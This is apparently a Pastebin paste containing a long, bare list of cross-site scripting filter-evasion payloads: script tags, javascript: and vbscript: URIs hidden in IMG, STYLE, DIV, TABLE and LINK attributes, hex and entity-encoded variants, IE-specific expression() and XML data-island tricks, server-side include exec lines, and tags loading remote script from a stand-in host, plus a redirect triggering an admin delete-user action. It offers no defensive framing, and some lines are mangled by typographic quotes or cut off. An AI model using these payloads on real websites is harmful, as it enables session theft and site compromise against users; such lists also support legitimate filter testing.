  777. </TITLE><SCRIPT>alert(“CrossSiteScripting”);</SCRIPT>
  778.  
  779.  
  780.  
  781.  
  782.  
  783. <IMG SRC=”javascript:alert(‘CrossSiteScripting’);”>
  784.  
  785. <IMG SRC=javascript:alert(‘CrossSiteScripting’)>
  786.  
  787. <IMG SRC=JaVaScRiPt:alert(‘CrossSiteScripting’)>
  788.  
  789. <IMG SRC=javascript:alert(“CrossSiteScripting”)>
  790.  
  791. <IMG SRC=`javascript:alert(“RM’CrossSiteScripting'”)`>
  792.  
  793. <IMG “””><SCRIPT>alert(“CrossSiteScripting”)</SCRIPT>”>
  794.  
  795. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  796.  
  797. <IMG SRC=”jav ascript:alert(‘CrossSiteScripting’);”>
  798.  
  799. <IMG SRC=”jav&#x09;ascript:alert(‘CrossSiteScripting’);”>
  800.  
  801. <IMG SRC=”jav&#x0A;ascript:alert(‘CrossSiteScripting’);”>
  802.  
  803. <IMG SRC=”jav&#x0D;ascript:alert(‘CrossSiteScripting’);”>
  804.  
  805. <IMG SRC=”  javascript:alert(‘CrossSiteScripting’);”>
  806.  
  807. <IMG SRC=”javascript:alert(‘CrossSiteScripting’)
  808.  
  809. <IMG DYNSRC=”javascript:alert(‘CrossSiteScripting’)”>
  810.  
  811. <IMG LOWSRC=”javascript:alert(‘CrossSiteScripting’)”>
  812.  
  813. <IMG SRC=’vbscript:msgbox(“CrossSiteScripting”)’>
  814.  
  815. <IMG SRC=”mocha:[code]”>
  816.  
  817. <IMG SRC=”livescript:[code]”>
  818.  
  819.  
  820.  
  821.  
  822.  
  823.  
  824.  
  825.  
  826.  
  827. <OBJECT TYPE=text/x-scriptlet” DATA=”http://test12345678.com/scriptlet.html”></OBJECT>
  828.  
  829. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘CrossSiteScripting’)></OBJECT>
  830.  
  831.  
  832.  
  833.  
  834.  
  835. <STYLE>@im\port’\ja\vasc\ript:alert(“CrossSiteScripting”)’;</STYLE>
  836.  
  837. <STYLE>@import’http://test12345678.com/CrossSiteScripting.css’;</STYLE>
  838.  
  839. <STYLE TYPE=text/javascript”>alert(‘CrossSiteScripting’);</STYLE>
  840.  
  841. <STYLE>.CrossSiteScripting{background-image:url(“javascript:alert(‘CrossSiteScripting’)”);}</STYLE><A CLASS=CrossSiteScripting></A>
  842.  
  843. <STYLE type=text/css”>BODY{background:url(“javascript:alert(‘CrossSiteScripting’)”)}</STYLE>
  844.  
  845. <STYLE>li {list-style-image: url(“javascript:alert(‘CrossSiteScripting’)”);}</STYLE><UL><LI>CrossSiteScripting
  846.  
  847. <STYLE>BODY{-moz-binding:url(“http://test12345678.com/CrossSiteScriptingmoz.xml#CrossSiteScripting”)}</STYLE>
  848.  
  849.  
  850.  
  851.  
  852.  
  853. <DIV STYLE=”background-image: url(javascript:alert(‘CrossSiteScripting’))”>
  854.  
  855. <DIV STYLE=”background-image:\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029″>
  856.  
  857. <DIV STYLE=”background-image: url(javascript:alert(‘CrossSiteScripting’))”>
  858.  
  859. <DIV STYLE=width: expression(alert(‘CrossSiteScripting’));”>
  860.  
  861.  
  862.  
  863. <LAYER SRC=”http://test12345678.com/script.html”></LAYER>
  864.  
  865. <LINK REL=”stylesheet” HREF=”javascript:alert(‘CrossSiteScripting’);”>
  866.  
  867. <LINK REL=”stylesheet” HREF=”http://test12345678.com/CrossSiteScripting.css”>
  868.  
  869.  
  870.  
  871. <BODY BACKGROUND=”javascript:alert(‘CrossSiteScripting’)”>
  872.  
  873. <BODY ONLOAD=alert(‘CrossSiteScripting’)>
  874.  
  875. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“CrossSiteScripting”)>
  876.  
  877. <iframe src=http://test12345678.com/index.html <
  878.  
  879.  
  880.  
  881.  
  882.  
  883. <TABLE BACKGROUND=”javascript:alert(‘CrossSiteScripting’)”>
  884.  
  885. <TABLE><TD BACKGROUND=”javascript:alert(‘CrossSiteScripting’)”>
  886.  
  887.  
  888.  
  889. <BGSOUND SRC=”javascript:alert(‘CrossSiteScripting’);”>
  890.  
  891. <BR SIZE=”&{alert(‘CrossSiteScripting’)}”>
  892.  
  893.  
  894.  
  895.  
  896.  
  897. <A HREF=”http://test12345678.com/”>CrossSiteScripting</A>
  898.  
  899. <A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”>CrossSiteScripting</A>
  900.  
  901. <A HREF=”http://1113982867/”>CrossSiteScripting</A>
  902.  
  903. <A HREF=”javascript:document.location=’http://test12345678.com/'”>CrossSiteScripting</A>
  904.  
  905.  
  906.  
  907. <BASE HREF=”javascript:alert(‘CrossSiteScripting’);//”>
  908.  
  909.  
  910.  
  911. \”;alert(‘CrossSiteScripting’);//
  912.  
  913.  
  914.  
  915. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘CrossSiteScripting’);”>
  916.  
  917.  
  918.  
  919.  
  920.  
  921.  
  922.  
  923.  
  924.  
  925. <CrossSiteScripting STYLE=”behavior: url(CrossSiteScripting.htc);”>
  926.  
  927.  
  928.  
  929.  
  930.  
  931. ¼script¾alert(¢CrossSiteScripting¢)¼/script¾
  932.  
  933.  
  934.  
  935.  
  936.  
  937.  
  938.  
  939. <IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert(‘CrossSiteScripting’))”>
  940.  
  941. <CrossSiteScripting STYLE=”CrossSiteScripting:expression(alert(‘CrossSiteScripting’))”> exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”); CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert(“CrossSiteScripting”))’>
  942.  
  943.  
  944.  
  945.  
  946.  
  947.  
  948.  
  949.  
  950.  
  951.  
  952.  
  953. a=”get”;
  954.  
  955. b=”URL(\””;
  956.  
  957. c=”javascript:”;
  958.  
  959. d=”alert(‘CrossSiteScripting’);\”)”;
  960.  
  961. eval(v+l+a+b);
  962.  
  963.  
  964.  
  965. <HTML xmlns:CrossSiteScripting>
  966.  
  967. <?import namespace=”CrossSiteScripting” implementation=”http://ha.ckers.org/CrossSiteScripting.htc”>
  968.  
  969. <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>
  970.  
  971.  
  972.  
  973. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘CrossSiteScripting’);”>]]>
  974.  
  975. </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  976.  
  977.  
  978.  
  979.  
  980.  
  981. <XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:alert(‘CrossSiteScripting’)”></B></I></XML>
  982.  
  983. <SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  984.  
  985.  
  986.  
  987.  
  988.  
  989. <XML SRC=”CrossSiteScriptingtest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  990.  
  991.  
  992.  
  993. <HTML><BODY>
  994.  
  995. <?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
  996.  
  997. <?import namespace=”t” implementation=”#default#time2″>
  998.  
  999. <t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>alert(“CrossSiteScripting”)</SCRIPT>”>
  1000.  
  1001. </BODY></HTML>
  1002.  
  1003.  
  1004.  
  1005. <SCRIPT SRC=”http://test12345678.com/CrossSiteScripting.jpg”></SCRIPT>
  1006.  
  1007.  
  1008.  
  1009. <!–#exec cmd=/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://test12345678.com/CrossSiteScripting.js></SCRIPT>'”–>
  1010.  
  1011.  
  1012.  
  1013. <? echo(‘<SCR)’;
  1014.  
  1015. echo(‘IPT>alert(“CrossSiteScripting”)</SCRIPT>’); ?>
  1016.  
  1017.  
  1018.  
  1019. <IMG SRC=”http://www.test12345678.com/file.php?variables=malicious”>
  1020.  
  1021.  
  1022.  
  1023. Redirect 302 /vlab.jpg http://test12345678.com/admin.asp&deleteuser
  1024.  
  1025.  
  1026.  
  1027.  
  1028.  
  1029.  
  1030.  
  1031.  
  1032.  
  1033. %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
  1034.  
  1035.  
  1036.  
  1037. &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;
  1038.  
  1039.  
  1040.  
  1041. &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#11
  1042.    
  1043.    
  1044. </body>
  1045. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!